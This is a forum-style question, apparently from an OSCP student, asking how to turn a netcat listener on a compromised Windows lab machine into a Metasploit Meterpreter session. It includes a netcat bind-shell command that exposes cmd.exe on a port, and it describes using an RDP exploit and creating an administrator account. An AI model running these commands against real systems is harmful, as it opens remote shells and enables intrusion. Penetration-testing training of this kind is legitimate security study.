• caglararli@hotmail.com
  • 05386281520

Using msf to connect to netcat listener and shell_to_meterperter

Çağlar Arlı      -    11 Views

Using msf to connect to netcat listener and shell_to_meterperter

I've been trying for hours and failing to do something that should be simple!

I have a box w/ admin (taking OSCP - nothing illegal). I used an RDP exploit, got a shell, added a user, put user in administrators group and as I sit I currently am on an rdesktop with an administrator.

Given - TARGET - 192.168.1.200, I have an admin shell and access to rdesktop. Have uploaded nc.exe

KALI - My machine - 192.168.1.100.

What I am trying to do is open a LISTENING port on the TARGET ... c:\nc -lvp 9999 -e c:\windows\system32\cmd.exe

...connect to that open port from my KALI box while using metasploit framework. I can connect using nc 192.168.1.200 9999, but I can't make that connection a metasploit session.

Then turn this connection into a meterpreter session using post/multi/manage/shell_to_meterpreter

Thanks!